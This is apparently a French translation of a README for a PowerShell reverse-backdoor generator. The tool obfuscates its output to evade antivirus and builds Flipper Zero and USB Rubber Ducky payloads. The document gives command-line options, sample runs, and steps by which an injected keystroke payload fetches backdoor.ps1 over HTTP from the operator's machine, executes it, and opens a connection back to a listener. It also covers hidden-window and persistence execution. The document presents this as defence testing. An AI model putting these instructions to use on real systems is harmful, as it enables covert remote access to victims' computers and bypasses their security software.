
Backdoor inversée écrite en PowerShell et obfusquée avec Python. Elle génère des payloads pour des appareils de hacking populaires comme Flipper Zero et Hak5 USB Rubber Ducky, et modifie sa signature après chaque build pour aider à éviter l'AV.
/******************************************************************************
Outil de backdoor inversé écrit en PowerShell et obscurci avec Python, fournissant une nouvelle signature après chaque construction pour éviter la détection. L'outil a la capacité de créer des payloads pour des appareils de hacking populaires comme Flipper Zero et Hak5 USB Rubber Ducky. Utilisez cet outil pour tester les défenses de votre système contre les techniques d'attaque avancées.
usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]
Générateur de backdoor PowerShell
options:
-h, --help affiche ce message d'aide et quitte
--ip-address IP_ADDRESS, -i IP_ADDRESS
Adresse IP à laquelle lier la backdoor (par défaut : 192.168.X.XX)
--port PORT, -p PORT Port de connexion de la backdoor (par défaut : 4444)
--random, -r Randomise le nom du fichier de la backdoor générée
--out OUT, -o OUT Spécifie le nom du fichier de la backdoor (chemins relatifs)
--verbose, -v Affiche les messages détaillés
--delay DELAY Délai en millisecondes avant l'exécution du payload Flipper Zero/Ducky-Script (par défaut : 100)
--flipper FLIPPER Fichier payload pour Flipper Zero (inclut la conversion EOL) (nom de fichier relatif)
--ducky Crée un fichier inject.bin pour le serveur HTTP
--server-port SERVER_PORT
Port d'écoute du serveur HTTP (--server) (par défaut : 8080)
--payload PAYLOAD Payload de backdoor USB Rubber Ducky/Flipper Zero à exécuter
--list--payloads Liste tous les payloads disponibles
-k KEYBOARD, --keyboard KEYBOARD
Disposition du clavier pour Bad USB/Flipper Zero (par défaut : us)
-A, --actually-listen
Écoute simplement les connexions backdoor
-H, --listen-and-host
Écoute les connexions backdoor et héberge le répertoire backdoor
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encodage du script backdoor
[*] Backdoor enregistrée backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Démarrage de l'écouteur de backdoor 192.168.0.223:4444, utilisez CTRL+BREAK pour arrêter
Un fichier nommé backdoor.ps1 sera créé dans le répertoire de travail actuel.
Testé sur Windows 11, Windows 10 et Kali Linux. Pour l'exécuter en fenêtre cachée et avec persistance, suivez le guide
powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1
Lors de l'utilisation de l'une de ces attaques, vous ouvrirez un serveur HTTP hébergeant la backdoor. Une fois la backdoor récupérée, le serveur HTTP s'arrêtera.
La commande ci-dessous générera un fichier appelé powershell_backdoor.txt, qui, lorsqu'il sera déclenché sur le Flipper, récupérera la backdoor depuis votre ordinateur via HTTP et l'exécutera.
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor --payload execute
[*] Démarrage du serveur HTTP hébergeant le fichier : http://192.168.0.223:8989/backdoor.ps1
[*] Démarrage de l'écouteur de backdoor 192.168.0.223:4444, utilisez CTRL+BREAK pour arrêter
Placez le fichier texte que vous avez spécifié (ex : powershell_backdoor.txt) dans votre Flipper Zero. Lorsque le payload est exécuté, il téléchargera et exécutera backdoor.ps1.
Voici un tutoriel pour générer un fichier inject.bin pour le Hak5 USB Rubber Ducky.
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Démarrage du serveur HTTP hébergeant le fichier : http://192.168.0.223:8989/backdoor.ps1
[*] Démarrage de l'écouteur de backdoor 192.168.0.223:4444, utilisez CTRL+BREAK pour arrêter
Un fichier nommé inject.bin sera placé dans votre répertoire de travail actuel. Java est requis pour cette fonctionnalité. Lorsque le payload est exécuté, il téléchargera et exécutera backdoor.ps1.
Pour encoder payload.txt en inject.bin pour les attaques USB Rubber Ducky, j'utilise encoder.jar créé par .
Voici le hash sha1 de backdoor.ps1 après 5 constructions.
1e158f02484e5c58d74c1507a1773392ffacfca2
6d18230a419195d0f77519abc0238768956cdd58
558a8cbac40239c9e6660a45cc8fc5d02b5057d7
caf4d0c8424eceb960d5f5c526e83ecd485c4ac9
947b57824917842d79f9cbcac8a795aa7c2f8a49